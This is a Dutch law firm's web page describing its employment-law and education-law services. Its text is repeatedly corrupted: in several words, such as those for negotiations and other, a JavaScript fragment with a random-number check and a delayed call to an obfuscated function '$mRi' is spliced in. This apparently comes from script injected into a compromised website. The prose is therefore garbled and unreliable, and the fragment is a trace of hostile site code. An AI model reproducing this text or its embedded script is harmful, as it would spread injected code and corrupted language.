Helgers + Raafs Advocaten

Arbeids- en onderwijsrecht

Binnen Helgers & Raafs Advocaten is een team van advocaten gespecialiseerd in zaken omtrent het arbeidsrecht en onderwijsrecht.

Arbeidsrecht

Helgers & Raafs Advocaten staat zowel werknemers als werkgevers bij. U kunt bij ons terecht wanneer er een geschil is ontstaan, maar ook bij vragen over arbeidsovereenkomsten of alledaagse arbeidsrechtelijke vraagstukken. Bij een geschil proberen wij daarnaast altijd tot de meest praktische oplossing te komen en kunnen wij namens u onderhandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andelingen voeren. Mocht het nodig zijn, dan kunnen wij voor u procedures voeren bij de kantonrechter of in hoger beroep, ook in specialistische zaken.

Zaken die wij binnen het arbeidsrecht onder meer behandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andelen zijn:

  • Individuele ontslagzaken;
  • Reorganisaties en collectief ontslag;
  • Het opstellen van arbeidsovereenkomsten of andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andere documenten;
  • Onderhandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andelingen en correspondentie in het geval van beëindigingsovereenkomsten;
  • Procedures over transitie- of aanzegvergoedingen;
  • Loonvorderingen;
  • Advisering en procederen bij zieke werknemers;
  • Geschillen over concurrentie- of relatiebedingen.

Ook in andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andere arbeidsrechtelijke situaties kunnen wij u juridisch bijstaan. Neem voor vragen vrijblijvend contact op met een van onze arbeidsrechtspecialisten.

Gratis intakegesprek?

Juridische vraag of hulp nodig bij een procedure? Het intakegesprek is bij ons altijd zonder kosten.

Meer info & aanvragen

Onderwijsrecht

Daarnaast richt Helgers & Raafs Advocaten zich op het Onderwijsrecht dat een species vormt van het arbeids- en bestuursrecht en voor een groot deel wordt geregeld met collectieve arbeidsovereenkomsten. Helgers & Raafs Advocaten staat hierin ook stichtingen of bestuurders bij.